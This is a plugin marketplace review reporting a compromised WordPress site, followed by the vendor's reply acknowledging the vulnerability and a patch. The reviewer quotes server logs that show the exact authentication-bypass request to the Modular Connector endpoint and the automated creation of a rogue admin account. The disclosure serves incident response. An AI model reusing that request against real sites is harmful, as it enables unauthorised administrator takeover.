Verified purchaser
Plugin is compromised, led to attack on one of my sites
Critical vulnerability in this plugin -
I was using this on just a handful of sites the last year or so. I got an alert that an admin user had been created with an obvious fake email address.
After running through the logs I came across this:
Authentication bypass
03:05:38 45.11.89.19 302 GET /api/modular-connector/login/anything?origin=mo&type=foo
The attacker calls the vulnerable ModularDS endpoint. The 302 response is a redirect — but critically, this redirect includes a valid WordPress authentication cookie. No username or password required.
Admin access confirmed
03:05:38 45.11.89.19 200 GET /wp-admin/index.php
Same second. The attacker accesses the WordPress admin dashboard. The 200 response means success — they're now logged in as an administrator.
Navigating to user creation
03:05:39 45.11.89.19 200 GET /wp-admin/user-new.php
The attacker loads the "Add New User" page. This is an automated script.
Creating the malicious account
03:05:39 45.11.89.19 302 POST /wp-admin/user-new.php
The attacker submits the form to create a new admin account. The 302 redirect indicates the form was processed successfully.
Attack complete
03:05:40 45.11.89.19 200 GET /wp-admin/users.php?update=add&id=10
The attacker is redirected to the users list with update=add&id=10 in the URL. This confirms user ID 10 (the "admin5" account) was successfully created.
Total time from first request to full compromise: 2 seconds.
Attacker attempted to use the new account
About 2 minutes after the account was created, a different IP attempted to log in — likely to use the newly created admin5 credentials:
2026-01-14 03:07:34 Access 151.241.30.63 200 GET /wp-login.php HTTP/1.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1)
2026-01-14 03:07:35 Access 151.241.30.63 200 POST /wp-login.php HTTP/1.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1)
In my case, the attacker only had approximately 90 seconds of access before I responded. A Wordfence scan confirmed no malware or backdoors were installed. However, if this plugin has been on your site for a while, the attacker may have had more time to cause damage.
The vulnerability appears to be an authentication bypass, which is as serious as it gets. Any site with this plugin installed should be considered potentially compromised.
Hector_ModularDS
Jan 30, 2026Hello myuill,
This is true. There was a vulnerability in our plugin that could lead to issues like this. It was identified on January 14 at 08:30 UTC, and 82 minutes later we released an update that fixed it.
We’re genuinely sorry for the trouble this caused. The good news is that across 40,000+ connected websites, we haven’t received any reports of site damage. The main impact we’ve seen is the creation of an unexpected admin user on a small percentage of sites, like what happened in your case.
For full transparency, we published a detailed post-mortem explaining what happened, how we responded, and what we’re changing to make sure it doesn’t happen again: https://modulards.com/a-post-mortem-on-the-modular-connector-security-incident-january-2026/
Again, we’re sorry you had to deal with this because of us. If you’re open to it, we’d appreciate the chance to earn back your trust.